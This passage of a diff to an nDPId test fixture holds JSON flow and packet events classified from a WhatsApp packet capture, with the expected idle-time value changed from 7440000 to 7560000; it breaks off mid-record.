00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1432820571716,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1432820571716,"pkt":"ABoRAAACABoRAAABCABFAABIABxAABAR+EMfDUkwCggAAQ2W0XQANGvUAQMAGCESpEIAAOlKSWdSWOu7U1cAIAAIAAGOsJ6wzx5AAgAIAAABTZrC3xA="} 00624{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1432820571716,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1432820571716,"pkt":"ABoRAAACABoRAAABCABFwACaAABAAEARx00KCAABHw1JMNF0DZYAhta5AAMAaiESpEIAAOlKSWdSWOu7U1dAAABmAQCy86Qxc0\/TrfZVVa\/eTEZDohPoeRLoRZc1aFVhrGc1f8RW2vMjT5P8rAsiwZ+p9NloXItIT0xPBspixBWhh83rOo673FqXfKhsmqCbgcYysEXxS1G0BQlmTNaw3EzKh7wFRa3N"} -00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":83,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820624900,"flow_last_seen":1432820624900,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1432820624900,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"158.85.58.42","src_port":44819,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1432820624900,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1432820624900,"pkt":"ABoRAAACABoRAAABCABFAAA85gNAAEAGcjAKCAABnlU6Kq8TFGbeopMoAAAAAKACOQiB\/gAAAgQFtAQCCAoABHUrAAAAAAEDAwQ="} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1432820625066,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432820625066,"pkt":"ABoRAAACABoRAAABCABFAAAoACpAABAGiB6eVToqCggAARRmrxMhXWzX3qKTKVAS\/\/8J0AAA"} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1432820625066,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432820625066,"pkt":"ABoRAAACABoRAAABCABFAAAo5gRAAEAGckMKCAABnlU6Kq8TFGbeopMpIV1s2FAQOQjQyAAA"} -00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":86,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820624900,"flow_last_seen":1432820625127,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1432820625127,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"158.85.58.42","src_port":44819,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":121,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820633802,"flow_last_seen":1432820633802,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1432820633802,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.192.222.189","src_port":42241,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":121,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1432820633802,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1432820633802,"pkt":"ABoRAAACABoRAAABCABFAAA8gDdAAEAGI\/4KCAABrcDevaUBFGYwrPiRAAAAAKACOQgdJAAAAgQFtAQCCAoABHimAAAAAAEDAwQ="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1432820633803,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432820633803,"pkt":"ABoRAAACABoRAAABCABFAAAoADlAABAG1BCtwN69CggAARRmpQHPUwduMKz4klAS\/\/9f4wAA"} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":123,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1432820633804,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432820633804,"pkt":"ABoRAAACABoRAAABCABFAAAogDhAAEAGJBEKCAABrcDevaUBFGYwrPiSz1MHb1AQOQgm3AAA"} -00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":124,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820633802,"flow_last_seen":1432820633834,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1432820633834,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.192.222.189","src_port":42241,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":183,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820681899,"flow_last_seen":1432820681899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1432820681899,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"158.85.58.109","src_port":49721,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":183,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1432820681899,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1432820681899,"pkt":"ABoRAAACABoRAAABCABFAAA8YBFAAEAG998KCAABnlU6bcI5FGZRO+t+AAAAAKACOQiNYgAAAgQFtAQCCAoABItvAAAAAAEDAwQ="} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":184,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1432820681901,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432820681901,"pkt":"ABoRAAACABoRAAABCABFAAAoAFlAABAGh6yeVTptCggAARRmwjmuxBSBUTvrf1AS\/\/\/2ZgAA"} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":185,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1432820681901,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432820681901,"pkt":"ABoRAAACABoRAAABCABFAAAoYBJAAEAG9\/IKCAABnlU6bcI5FGZRO+t\/rsQUglAQOQi9XwAA"} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":186,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820681899,"flow_last_seen":1432820681935,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1432820681935,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"158.85.58.109","src_port":49721,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00838{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":225,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":46,"flow_first_seen":1432820558921,"flow_last_seen":1432820572412,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":2486,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1432820691515,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"184.173.179.46","src_port":35480,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":235,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820693796,"flow_last_seen":1432820693796,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1432820693796,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"158.85.5.199","src_port":51570,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":235,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1432820693796,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1432820693796,"pkt":"ABoRAAACABoRAAABCABFAAA8Y3lAAEAGKR4KCAABnlUFx8lyAbsu9\/NsAAAAAKACOQjjKgAAAgQFtAQCCAoABJAVAAAAAAEDAwQ="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":236,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1432820693846,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432820693846,"pkt":"ABoRAAACABoRAAABCABFAAAoAHNAABAGvDieVQXHCggAAQG7yXLRCAyTLvfzbVAS\/\/82fwAA"} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":237,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1432820693846,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432820693846,"pkt":"ABoRAAACABoRAAABCABFAAAoY3pAAEAGKTEKCAABnlUFx8lyAbsu9\/Nt0QgMlFAQOQj9dwAA"} -00797{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":238,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820693796,"flow_last_seen":1432820694164,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1432820694164,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"158.85.5.199","src_port":51570,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00837{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1432820693796,"flow_last_seen":1432820695137,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":232,"flow_tot_l4_payload_len":742,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"158.85.5.199","src_port":51570,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00699{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1432820624900,"flow_last_seen":1432820633508,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":968,"flow_tot_l4_payload_len":3069,"flow_avg_l4_payload_len":102,"midstream":0,"thread_ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"158.85.58.42","src_port":44819,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00701{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":62,"flow_first_seen":1432820633802,"flow_last_seen":1432820681629,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":505,"flow_tot_l4_payload_len":2241,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.192.222.189","src_port":42241,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":83,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820624900,"flow_last_seen":1432820624900,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1432820624900,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"158.85.58.42","src_port":44819,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1432820624900,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1432820624900,"pkt":"ABoRAAACABoRAAABCABFAAA85gNAAEAGcjAKCAABnlU6Kq8TFGbeopMoAAAAAKACOQiB\/gAAAgQFtAQCCAoABHUrAAAAAAEDAwQ="} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1432820625066,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432820625066,"pkt":"ABoRAAACABoRAAABCABFAAAoACpAABAGiB6eVToqCggAARRmrxMhXWzX3qKTKVAS\/\/8J0AAA"} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1432820625066,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432820625066,"pkt":"ABoRAAACABoRAAABCABFAAAo5gRAAEAGckMKCAABnlU6Kq8TFGbeopMpIV1s2FAQOQjQyAAA"} +00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":86,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820624900,"flow_last_seen":1432820625127,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1432820625127,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"158.85.58.42","src_port":44819,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":121,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820633802,"flow_last_seen":1432820633802,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1432820633802,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.192.222.189","src_port":42241,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":121,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1432820633802,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1432820633802,"pkt":"ABoRAAACABoRAAABCABFAAA8gDdAAEAGI\/4KCAABrcDevaUBFGYwrPiRAAAAAKACOQgdJAAAAgQFtAQCCAoABHimAAAAAAEDAwQ="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1432820633803,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432820633803,"pkt":"ABoRAAACABoRAAABCABFAAAoADlAABAG1BCtwN69CggAARRmpQHPUwduMKz4klAS\/\/9f4wAA"} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":123,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1432820633804,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432820633804,"pkt":"ABoRAAACABoRAAABCABFAAAogDhAAEAGJBEKCAABrcDevaUBFGYwrPiSz1MHb1AQOQgm3AAA"} +00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":124,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820633802,"flow_last_seen":1432820633834,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1432820633834,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.192.222.189","src_port":42241,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":183,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820681899,"flow_last_seen":1432820681899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1432820681899,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"158.85.58.109","src_port":49721,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":183,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1432820681899,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1432820681899,"pkt":"ABoRAAACABoRAAABCABFAAA8YBFAAEAG998KCAABnlU6bcI5FGZRO+t+AAAAAKACOQiNYgAAAgQFtAQCCAoABItvAAAAAAEDAwQ="} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":184,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1432820681901,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432820681901,"pkt":"ABoRAAACABoRAAABCABFAAAoAFlAABAGh6yeVTptCggAARRmwjmuxBSBUTvrf1AS\/\/\/2ZgAA"} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":185,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1432820681901,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432820681901,"pkt":"ABoRAAACABoRAAABCABFAAAoYBJAAEAG9\/IKCAABnlU6bcI5FGZRO+t\/rsQUglAQOQi9XwAA"} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":186,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820681899,"flow_last_seen":1432820681935,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1432820681935,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"158.85.58.109","src_port":49721,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":235,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820693796,"flow_last_seen":1432820693796,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1432820693796,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"158.85.5.199","src_port":51570,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":235,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1432820693796,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1432820693796,"pkt":"ABoRAAACABoRAAABCABFAAA8Y3lAAEAGKR4KCAABnlUFx8lyAbsu9\/NsAAAAAKACOQjjKgAAAgQFtAQCCAoABJAVAAAAAAEDAwQ="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":236,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1432820693846,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432820693846,"pkt":"ABoRAAACABoRAAABCABFAAAoAHNAABAGvDieVQXHCggAAQG7yXLRCAyTLvfzbVAS\/\/82fwAA"} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":237,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1432820693846,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432820693846,"pkt":"ABoRAAACABoRAAABCABFAAAoY3pAAEAGKTEKCAABnlUFx8lyAbsu9\/Nt0QgMlFAQOQj9dwAA"} +00797{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":238,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820693796,"flow_last_seen":1432820694164,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1432820694164,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"158.85.5.199","src_port":51570,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": 